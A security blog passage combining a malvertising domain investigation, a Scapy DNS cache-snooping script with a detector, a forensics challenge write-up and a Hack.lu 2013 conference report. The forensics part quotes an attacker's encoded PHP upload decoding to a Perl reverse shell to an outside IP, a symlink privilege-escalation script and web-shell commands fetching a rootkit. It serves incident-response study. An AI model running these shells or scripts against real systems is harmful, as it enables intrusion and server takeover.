* appdownloader.info
* lovelinks.us

Cool. Let’s not dig into that too quickly. Let’s first do a little lookup on the IP addresses for these hosts.

* appdownloader.info -> 178.63.45.183
* lovelinks.us -> 69.4.227.12

Thankfully I’ve just finished writing a little code to talk to VirusTotal so I’ll use their service to do a little lookup for these two IP addresses.

178.63.45.183

whob -gnp (Nothing interesting from Team Cymru whois service :( )

178.63.45.183 | origin-as 24940 (178.63.0.0/16) | as-path 3130 1239 3356 24940 | AVAZU-INC | Avazu Inc.
actually8.info
adtracking.mobi
appdownloader.info
blog.3g.de
concern8.info
cram8.info
hubs8.info
iphoneohnevertrag.de
mediaplayer-download888.net
mobiworld888.com
nevertheless8.info
pageerror-download.com
plenty8.info
related8.info
remembered88.info
required88.info
teebikhealth.com
turning8.info
weekly-gadget-winner.net
www.nevertheless8.info
www.turning8.info

That’s a whole bunch of hostnames associated with this IP address. There’s an even larger list of detected URLs associated with the IP address. Here’s a simple snippet from the VT report:

http://related8.info/lps/flvupdate.php?campaignid=9842176    (Evilness: 1/39 [Scan date: 2013-06-13 20:23:45])
http://turning8.info/lps/flvupdate.php?campaignid=5816578&czid=yxzhenu1ode2ntc4mq==&subid=nym1ci3wn7lz8fbzlracgkvygljgonpseigb&pubid=&lang=en&at=0    (Evilness: 1/37 [Scan date: 2013-06-05 18:45:21])
http://concern8.info/lps/flvplayer.php?campaignid=4817781&czid=YXZhenU0ODE3NzgxMQ==&subid=&pubid=&lang=en&at=0    (Evilness: 3/39 [Scan date: 2013-05-16 20:27:27])

I’d say there’s definitely something fishy going on with this IP address. So let’s have a look at the other IP address…perhaps there’s something there.

69.4.227.12

whob -gnp (Nothing interesting from Team Cymru whois service :( )

69.4.227.12 | origin-as 36351 (69.4.226.0/23) | as-path 7660 4635 36351 | HOSTINGSERVICES-INC | Hosting Services, Inc.

Here’s the full output from my tool…

Checking IP: 69.4.227.12
Message: IP address found in dataset

Passive DNS report for: 69.4.227.12

Hostname: lovelinks.us    Last seen: 2013-11-20 00:00:00
Hostname: tiantiankutao.com   Last seen: 2013-11-20 00:00:00

Detected URLS

URL Detected: http://lovelinks.us/    (Evilness: 1/51 [Scan date: 2013-12-19 22:51:27])
URL Detected: http://lovelinks.us/gray/mobo/mobo.php  (Evilness: 1/51 [Scan date: 2013-12-19 16:10:11])

Definitely badness happening on these two IP addresses. Unfortunately the domain information for the two domains in question is a little less useful.

So what’s next? Let’s fire up a Thug instance and find out if there’s something fun like an exploit kit or unicorns lurking behind these URLs.

http://lovelinks.us/gray/mobo/mobo.php

[window open redirection] about:blank -> http://lovelinks.us/gray/mobo/mobo.php
[HTTP] URL: http://lovelinks.us/gray/mobo/mobo.php (Status: 200, Referrer: None)
[HTTP] URL: http://lovelinks.us/gray/mobo/mobo.php (Content-type: text/html, MD5: b15a42594852ea1d8e74c7a15c60f9c9)
[HREF Redirection (document.location)] Content-Location: http://lovelinks.us/gray/mobo/mobo.php --> Location: http://sofcotrk.com/mt/v2a4w264b4y233r244z2u2b4/&subid1=all
[window open redirection] http://lovelinks.us/gray/mobo/mobo.php -> http://sofcotrk.com/mt/v2a4w264b4y233r244z2u2b4/&subid1=all
[HTTP Redirection (Status: 302)] Content-Location: http://sofcotrk.com/mt/v2a4w264b4y233r244z2u2b4/&subid1=all --> Location: http://app.appsflyer.com/com.mobogenie.markets?pid=mundomedia_int&c=mobogenie&clickid=bca89ef05128a49a627ed6450ea1bedc&af_siteid=CD13939&campaignid=e2c4w2b4e4t223
[HTTP] URL: https://play.google.com/store/apps/details?id=com.mobogenie.markets&referrer=af_tranid%3DBR3AAM7KS4W9ESM%26clickid%3Dbca89ef05128a49a627ed6450ea1bedc%26c%3Dmobogenie%26af_siteid%3DCD13939%26pid%3Dmundomedia_int%26campaignid%3De2c4w2b4e4t223 (Status: 200, Referrer: http://lovelinks.us/gray/mobo/mobo.php)
[HTTP] URL: https://play.google.com/store/apps/details?id=com.mobogenie.markets&referrer=af_tranid%3DBR3AAM7KS4W9ESM%26clickid%3Dbca89ef05128a49a627ed6450ea1bedc%26c%3Dmobogenie%26af_siteid%3DCD13939%26pid%3Dmundomedia_int%26campaignid%3De2c4w2b4e4t223 (Content-type: text/html; charset=utf-8, MD5: 44aa3b0d8eda3b69083cd49c2e8c3bac)
[Navigator URL Translation] local("Roboto Thin"), local("Roboto-Thin"), url(//ssl.gstatic.com/fonts/roboto/v10/PP2U5prMl9yvKSWVu6DtvPesZW2xOQ-xsNqO47m55DA.eot) format("embedded-opentype"), url(//ssl.gstatic.com/fonts/roboto/v10/vzIUHo9z-oJ4WgkpPOtg1_esZW2xOQ-xsNqO47m55DA.woff) format("woff") --> https://play.google.com/store/apps/local("Roboto Thin"), local("Roboto-Thin"), url(//ssl.gstatic.com/fonts/roboto/v10/PP2U5prMl9yvKSWVu6DtvPesZW2xOQ-xsNqO47m55DA.eot) format("embedded-opentype"), url(//ssl.gstatic.com/fonts/roboto/v10/vzIUHo9z-oJ4WgkpPOtg1_esZW2xOQ-xsNqO47m55DA.woff) format("woff")

Nope. No exploit kits here. To me it just looks like a Google Play link. Probably to something less than useful in the Google Store for Android. If you take a look at the one screenshot we can definitely see that the attackers want us to head over to the store.

GooglePlay

So it’s not a direct malware file, but still something definitely a little shady. And this ladies and gentlemen, is why you run advert blocking software. Thanks Cyanide and Happiness.

DNS Cache Snooping in Scapy


Since giving the Scapy workshop at Brucon and Hack.lu earlier this year, I’ve been giving some thought to using the tool for something other than just learning. Perhaps even using it to rewrite some existing tools so I can learn how stuff works a bit better behind the scenes.

Recently I read this post from SANS which illustrated how an attacker would use DNS queries made against a server to launch phishing attacks and the like against users of that DNS server. With all the use of watering hole attacks these days, I thought I’d try my hand at writing a script to do what the Nmap script in the post did.

So I put together a little bit of Scapy that made a non-recursive DNS query against a DNS server of the user’s choice. The script would take a file containing hostnames and query those against the server in question. My thinking is that if the host had been cached we’d get a response. If not, the DNS server would have to perform a recursive query to get the answer. In the code I’ve said that I don’t want recursive queries (rd=0). I’ve also put in an ugly little hack to weed out responses from the root servers.

For some reason I’m getting responses saying that all my hosts are cached, even when I put in lookups for hosts that I know aren’t or shouldn’t be in the cache. So one of two things is happening here. One, my code is wrong, which is entirely likely. Or two, my DNS server is ignoring my don’t-recurse option and doing lookups anyway. I need to do a little more reading on DNS and probably look a little closer at my code. I’m also getting ICMP destination unreachable packets being sent from my machine to the DNS server. I wanted to assume it’s because of the lack of a handshake, but this is UDP so that theory is out the window. The strange thing is that it only seems to happen after lookups for hosts that should be cached…

That said, I’d love some feedback from people who know more about this than me. I’m a little rusty on this sort of thing. Drop me your thoughts and comments via @undeadsecurity or email.

Here’s the pcap.

Here’s the code:

#!/usr/bin/env python3
# DNS Cache snooping with Scapy

import argparse
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1


def _text(value):
    """Scapy hands back names as bytes on Python 3; show them as plain text."""
    return value.decode('utf-8', 'replace') if isinstance(value, bytes) else str(value)


def dnssnoop(adomains, aresolver):
    """Check the server for hosts in our list"""

    with open(adomains, 'r') as domains:
        for host in domains:
            nhost = host.strip()
            if not nhost:
                continue
            # rd=0 asks the resolver not to recurse, so only a name already in its
            # cache should come back with an answer.  sr1() sends from a raw socket,
            # so no UDP port is bound on this machine: Scapy sniffs the reply, but the
            # kernel also answers it with an ICMP port unreachable.
            dnsquery = sr1(IP(dst=aresolver)/UDP()/DNS(rd=0, qd=DNSQR(qname=nhost)),
                           timeout=2, verbose=0)
            if dnsquery is None or not dnsquery.haslayer(DNS):
                print("No response: %s" % nhost)
                continue
            dns = dnsquery[DNS]
            # A non-cached name comes back with an empty answer section (ancount == 0),
            # often with a root-server referral in the authority section, or with a
            # non-zero rcode (e.g. REFUSED).  Only a record in the answer section counts
            # as a cache hit; dnsquery[DNSRR] would otherwise pick up the referral.
            if dns.rcode != 0 or dns.ancount == 0 or not dnsquery.haslayer(DNSRR):
                print("Not cached: %s" % nhost)
                continue
            rr = dnsquery[DNSRR]
            rdata = getattr(rr, 'rdata', b'')
            if "root-servers" in _text(rdata):
                print("Not cached: %s" % nhost)
            else:
                print("Cached: %s\t\t\tResponse: %s" % (_text(rr.rrname), _text(rdata)))


def main():

    parser = argparse.ArgumentParser(description='dns cache snooping',
                                     usage='%(prog)s -d domains.txt -r resolver')
    parser.add_argument('--domains', '-d', dest='domains', help='file with domains to check')
    parser.add_argument('--resolver', '-r', dest='resolver', help='DNS server to use')
    parser.add_argument('--version', '-v', action='version', version='%(prog)s 0.1')
    args = parser.parse_args()

    # Both arguments are required.
    if not args.domains or not args.resolver:
        parser.print_help()
        sys.exit(1)

    dnssnoop(args.domains, args.resolver)


if __name__ == '__main__':
    main()
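The script above is the snooping side. As an added example (not code from the post), here is the defender's counterpart: a minimal parser for the DNS query header that reads the RD bit, and a check that flags a client which sends non-recursive queries for several distinct names to a resolver that only serves end users. Such clients always set RD, so a run of RD=0 queries from one address is the footprint the script above leaves. The sample queries are constructed inline; the 192.0.2.x addresses and the threshold of three names are assumptions for the example.

```python
import struct

RD_FLAG = 0x0100   # "recursion desired" bit in the DNS header flags word
QR_FLAG = 0x8000   # set on responses, clear on queries


def build_query(qname, rd, txid=0x1234):
    """Build a minimal A-record query for qname with RD set (rd=True) or cleared."""
    flags = RD_FLAG if rd else 0
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)  # qdcount=1
    labels = b"".join(bytes([len(part)]) + part.encode("ascii")
                      for part in qname.rstrip(".").split("."))
    question = labels + b"\x00" + struct.pack("!HH", 1, 1)     # QTYPE=A, QCLASS=IN
    return header + question


def parse_query(msg):
    """Return (qname, recursion_desired) for a DNS query; ValueError if malformed."""
    if len(msg) < 12:
        raise ValueError("short DNS header")
    _txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if flags & QR_FLAG:
        raise ValueError("message is a response, not a query")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        if pos >= len(msg):
            raise ValueError("truncated question name")
        length = msg[pos]
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer not allowed in question name")
        if pos + 1 + length > len(msg):
            raise ValueError("truncated label")
        labels.append(msg[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels) + ".", bool(flags & RD_FLAG)


def snoop_suspects(observed, threshold=3):
    """Return {client: [names]} for clients that sent non-recursive queries for at
    least `threshold` distinct names.  `observed` is a list of (client, raw_message)."""
    names_by_client = {}
    for client, msg in observed:
        try:
            qname, rd = parse_query(msg)
        except ValueError:
            continue   # malformed or not a query; out of scope for this check
        if not rd:
            names_by_client.setdefault(client, set()).add(qname)
    return {client: sorted(names)
            for client, names in names_by_client.items()
            if len(names) >= threshold}


# Constructed sample traffic (not from the post's pcap): one client walking a list
# of names with RD cleared, one normal client, and one single RD=0 query.
SAMPLE_QUERIES = [
    ("192.0.2.10", build_query("www.example.com", rd=False)),
    ("192.0.2.10", build_query("mail.example.com", rd=False)),
    ("192.0.2.10", build_query("bank.example.net", rd=False)),
    ("192.0.2.10", build_query("login.example.org", rd=False)),
    ("192.0.2.55", build_query("www.example.com", rd=True)),
    ("192.0.2.55", build_query("mail.example.com", rd=True)),
    ("192.0.2.77", build_query("ns.example.com", rd=False)),
]

if __name__ == "__main__":
    for client, names in snoop_suspects(SAMPLE_QUERIES).items():
        print("%s: %d non-recursive lookups: %s" % (client, len(names), ", ".join(names)))
```

RD=0 is normal between name servers, so this check only makes sense on the client-facing side of a recursive resolver, not on an authoritative server. The configuration fix is the same in either case: restrict who may query the cache at all (in BIND, `allow-recursion` and `allow-query-cache` limited to your own client ranges), after which the snooping script gets REFUSED instead of a cache hit or miss.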

Archives Online

Archive Dot Zonbi Dot Org

After much faffing about and hair pulling I’ve laid my attempts to migrate my old blog (Wordpress based) across to the new format to rest. Some of the scripts that were out there for this process kind of worked, but there simply wasn’t enough data to continue with the migration. And there’s no way I’m going to rewrite all of them again :)

So without any further ado, my old posts and rants are available for your perusal here.

Yes, it’s a Wordpress instance, which is just asking for trouble, but I figure, what the heck…scanners are gonna scan.

ISSA DFIR Challenge

This has been sitting in my TODO list for far too long. A challenge was posted here a while back and I thought I’d take a look at it. This is a very quick and dirty look at the challenge on a rainy Sunday afternoon.

Three files were posted along with a series of questions:

 issa-2013-challenge.pcap
 issa-2013-challenge.sda1.dd
 vmss.core  (not sure if this was part of the challenge, it doesn't appear to be)

Most of my work was done in Wireshark. I did run the packet capture through Foremost but that didn’t reveal too much. I also wrote a little code to help read some of the packet data, but that wasn’t really required.

Answering the questions

1. What time did the attack begin?

This would depend on what you consider an attack. I would say the attack began at the initialization of the Nikto scan. This happened at packet 21 in the pcap. Arrival time: Feb 8th 2013 23:41 CET. There were a few ICMP echo requests before this packet, but I’d consider the Nikto scan the point at which simple recon became attack.

[screenshot: attackstart]

2. What was the initial indicator?

A web scan from 58.64.132.100

3. What tool was used to scan the webserver?

Nikto v2.1.5

[screenshot: niktoscan]

4. What application was exploited to compromise the webserver?

The TinyBrowser plugin for the TinyMCE application that runs on Joomla. The attacker was able to upload an arbitrary file to the server, which was then executed.

[screenshot: file_upload]

5. What was the ip address of the attacker that compromised the webserver?

58.64.132.100

[screenshot: ipsummary]

6. Were there any additional ip addresses used in the attack? If so, what are they?

58.64.132.141

[screenshot: ipsummary]

7. What file was initially placed on the machine by the attacker

A php script “ogfcmxaiaexofkdozkvz.php”

Base64 encoded contents:

cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCI1OC42NC4xMzIuMTAwOjQ0NDQiKTtTVERJTi0+ZmRvcGVuKCRjLHIpOyR+LT5mZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGU8Pjsn

And if we decode that little bit of Base64 we get this:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"58.64.132.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

So now we have a simple command and control system running to 58.64.132.100 on port 4444.

8. What directory was it located in?

/var/www/images/stories/

9. What allowed the upload of that file?

A vulnerability in the plugin for TinyMCE that allowed for arbitrary file uploads.

10. What was the first operating system command executed by the attacker?

ls

[screenshot: lscommand]

11. How did the attacker attempt to escalate privileges?

Using a simple script called timeserver.bash.

[screenshot: timeserver]

Contents:

#!/bin/bash
if [ $# -eq 0 ]; then
    echo "Usage: $0 /path/to/file"
    exit 1
fi

mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :)  File will then be owned by your user.  Try /etc/passwd...\n"

12. What was the timestamp that privilege escalation was attempted?

First attempt was at packet 23148, time: Feb 9th, 2013 00:37:05 CET. Second attempt was at packet 23160, time: Feb 9th, 2013 00:37:50 CET.

[screenshot: privesc]

13. Is the machine still at risk for this method of privilege escalation? Why?

Yes, probably. The attack didn’t work because of a lack of permissions on the attempted directory. A simple change to the script and it may have worked.

[screenshot: privescfail]

14. What files were placed on the webserver by the attacker?

ogfcmxaiaexofkdozkvz.php

timeserver.bash

webstats.txt

15. How was the attacker able to place each file on the machine?

ogfcmxaiaexofkdozkvz.php : file upload using TinyMCE

timeserver.bash : wget using shell from file upload

webstats.txt : wget using shell from file upload

16. What additional tool was placed on the machine that gave the attacker direct access?

webstats.txt (GET request at packet 23176). This is a simple C99 shell, very common in this kind of attack. It allows almost full access to the affected server. They’re also pretty easy to detect.

The GET request for the shell

[screenshot: webstats]

What the shell looks like when rendered in the browser

[screenshot: c99shell]

17. How did the attacker access this tool?

GET request at packet 23340

[screenshot: getrequest]

18. What did the attacker take from the webserver?

I can’t find any indication of any data being moved from the server. The attacker did manage to dump database information to file, but I can’t find anything to indicate that this was exfilled.

19: What are the md5 hashes of all the files taken?

Team sadface

20. What directory was created by the attacker?

/var/tmp/.www

21. What are the contents of this directory?

 > linux-rootkit.tar.gz
 > linux-rootkit
   \-> kontrol
   \-> kontrol.c
   \-> security.ko

22. Was the attacker able to successfully execute the tool in this directory? How do you know?

No, the attacker wasn’t able to execute the command. He attempted a number of times but wasn’t able to execute the file.

23. What was the exact netstat command that was executed at Fri Feb 08 2013 18:53:37? What ports were listening based on the output from that command?

netstat -nap

Ports 22, 80 and 3306

Netstat command:

[screenshot: netstat]

Listening ports:

[screenshot: listeningports]

24. How was the attacker able to gain access to the database credentials?

The database user used for the Joomla installation was “root”, and the plain text password for this user was stored in the “configuration.php” file. The attacker could then use the mysqldump command to dump all the databases if he so desired.

[screenshot: dbfail]

25. List the points of remediation that need to occur as a result of the analysis performed.

  1. Ensure that all web applications are kept up to date.
  2. Ensure that the user used for database connections isn’t the root user.
     2.1 Ensure that the database user is only allowed to access the required application database.
  3. Use a firewall to only allow the required connections both to and from the server.

There was also this rather interesting post from Spiderlabs. It may be a bit much to install and maintain, but it would probably have helped to detect this intrusion.

Extra credit stuff

Using Scapy to pull out the commands used:

I got a bit bored with looking through the HTTP POSTs so I wrote a little code to parse through the pcaps I’d identified with HTTP POSTs in them.

[screenshot: http posts]

It was probably a little long-winded, but I extracted the individual packet numbers and wrote them to a pcap file. I then parsed through the packets and pulled out just the payloads. From there I did a little searching and pulled out just the lines (with the commands) I was interested in. The code is available here.

Here’s the list of commands used by the attacker:

act=cmd&cmd=pwd&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%2Fwww&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Fwww%2Fconfig.php&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Fwww%2Fconfig.php&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+%2Fvar%2Fwww&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%0D%0A&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mkdir+.&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mkdir+-p+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mv+linux-rootkit.tar.gz+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar+-tzvf+linux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar-zxvf+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar+-xzxvf+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mv+linux-rootkit+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=chmod+755+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%2Ftmp%2F.www%2F&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=which+gcc&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1

We can see that the attacker pulled down a file “linux-rootkit.tar.gz” and untarred it to /var/tmp/.www. He then attempted to run the “kontrol” file, but this failed.
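The last step of the extraction described above, turning the raw C99 POST bodies into a readable command timeline, as an added example that is not the post's own script (that one is linked from the post, not reproduced here). The sample input is the 22 POST bodies listed above, copied from the post; the decoder uses only the standard library. Repeated identical commands are collapsed with a count, which is how the attacker's retries of the `cat` and `tar` commands stand out.

```python
from urllib.parse import parse_qs

# The C99 "act=cmd" POST bodies from the post, in capture order.
C99_POSTS = """\
act=cmd&cmd=pwd&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%2Fwww&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Fwww%2Fconfig.php&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Fwww%2Fconfig.php&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+%2Fvar%2Fwww&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%0D%0A&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mkdir+.&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mkdir+-p+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mv+linux-rootkit.tar.gz+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar+-tzvf+linux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar-zxvf+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar+-xzxvf+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mv+linux-rootkit+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=chmod+755+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%2Ftmp%2F.www%2F&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=which+gcc&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
""".splitlines()


def extract_commands(bodies):
    """Return [(command, working_dir)] in capture order from C99 POST bodies.
    Only bodies with act=cmd are command executions; anything else is skipped."""
    commands = []
    for body in bodies:
        params = parse_qs(body, keep_blank_values=True)  # also turns '+' into spaces
        if params.get("act") != ["cmd"]:
            continue
        cmd = params.get("cmd", [""])[0].strip()   # drops the stray %0D%0A on one line
        cwd = params.get("d", [""])[0]
        commands.append((cmd, cwd))
    return commands


def collapse_repeats(commands):
    """Collapse consecutive identical commands into (command, count)."""
    collapsed = []
    for cmd, _cwd in commands:
        if collapsed and collapsed[-1][0] == cmd:
            collapsed[-1] = (cmd, collapsed[-1][1] + 1)
        else:
            collapsed.append((cmd, 1))
    return collapsed


if __name__ == "__main__":
    for cmd, count in collapse_repeats(extract_commands(C99_POSTS)):
        print("%2dx  %s" % (count, cmd))
```

The working directory (`d=`) stays `/var/www/images/stories/` for every request, which matches the upload location in question 8, and the collapsed view shows the three `cat/var/...` attempts with a missing space before the attacker got the path right.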

All in all this was a great little challenge. I could probably have automated a lot more of this, but I’m a little rusty when it comes to DFIR.

Hack.lu 2013

Hack.lu 22-24th October

“We’re not computers, Sebastian, we’re physical.”

Comotion and I were invited to Hack.lu this year. Now in its ninth year, Hack.lu is a technical conference held each year in the little city of Luxembourg. Any conference that uses quotes from Blade Runner is a winner in my books.

Our Workshop: Protocol Exploration Workshop

This year we were invited to give our workshop on Scapy. The workshop looks at low-level packetry and started as a gentleman’s bet between myself and @blackswanburst one evening/morning on my balcony after probably a little too much good whisky. We look at performing a simple HTTP GET request to a web site, but only using Scapy. In this workshop we look at ARP, DNS and HTTP, after some great feedback from when we gave the workshop at Brucon last month. We spent a little more time going through some of the basics of building packets and I think the class got a lot out of it. The pcaps, example code and slides for both presentations are available here. Any ideas, comments and feedback are definitely welcome.

Interesting Talks

* Debugging and Reversing the HTC Android Bootloader - Cedric Halbronn and Nicolas Hureau

I enjoyed this talk on reversing the HTC bootloader. The speakers gave a great breakdown of the bootloader and how the whole ecosystem fits together. I’d have liked a little more information on the reversing side, but that’s just me. The debugger they put together definitely looked cool and is something to look at if you’re into Android.

* Lockpicking and IT security - Walter Belgers

This was an interesting little talk. Yes, I did know about some of the information security stuff, but talking about similar problems in the physical/lock space was an interesting twist. The speaker knew his stuff and also knew how to present his content. Very entertaining talk.

* The Big Evil in Small Pieces - A malware Reverser’s Fairytale - Marion Marschalek

I really enjoyed this talk. Marion outlined how she reversed a particularly tricky piece of malware that was given as a challenge to female reversers. The content was well presented and I really liked the links at the end for further reading. Personally I think this talk would be better served as a workshop as there was a lot of very complicated (for me) content, most of which needed to be explored a little more thoroughly. If you’re into malware or reversing I’d recommend either checking out the video or slides for this talk.

* TCP Idle Scans in IPv6 - Mathias Morbitzer

Very cool talk about Idle scans on IPv6. Mathias went through the basics of Idle scans on IPv4 then proceeded to explain it for IPv6. The talk was well presented and very informative.

* Pearls of Cybercrime: malicious campaigns of year 2013 - Fyodor Yarochkin and Vladimir Kropotov

Interesting talk about badware as seen from the Russian perspective. There was a lot of information here and it was interesting to hear about badware from another point of view.

* Exploit Krawler Framework - Sebastien Larinier and Guillaume Arcas

Sebastien and Guillaume (good to finally meet you man :) ) gave a very cool talk on their framework for harvesting exploits and other fun stuff. It’s probably a little too complicated for my needs but it was well presented and something I’d look into when I have a little spare time.

Highlights

Some interesting stuff from the con…

* Suricata / Emerging Threats crew

The Suricata guys and girls were in attendance at the conference. They held workshops on both days with some interesting content. I have to say that they were an awesome bunch of people. So Matt, Trevor and the rest of the late-night beer crew… thanks for the great company.

* Fluxfingers CTF

Once again the FluxFingers crew ran the CTF event. And once again the CTF beat my n00b ass with a rather large bat. Yes, we probably should have pulled in all the Chaos Monkeys for this, but it was a last minute decision :) I love CTFs where you have to learn stuff and think about things a different way. The challenge I enjoyed the most was the RoboAuth challenge. It seemed like a simple reversing challenge until it came to grabbing the second password. That’s where my butt was kicked rather hard.

Other people’s write-ups are available here.

* Speakers dinner

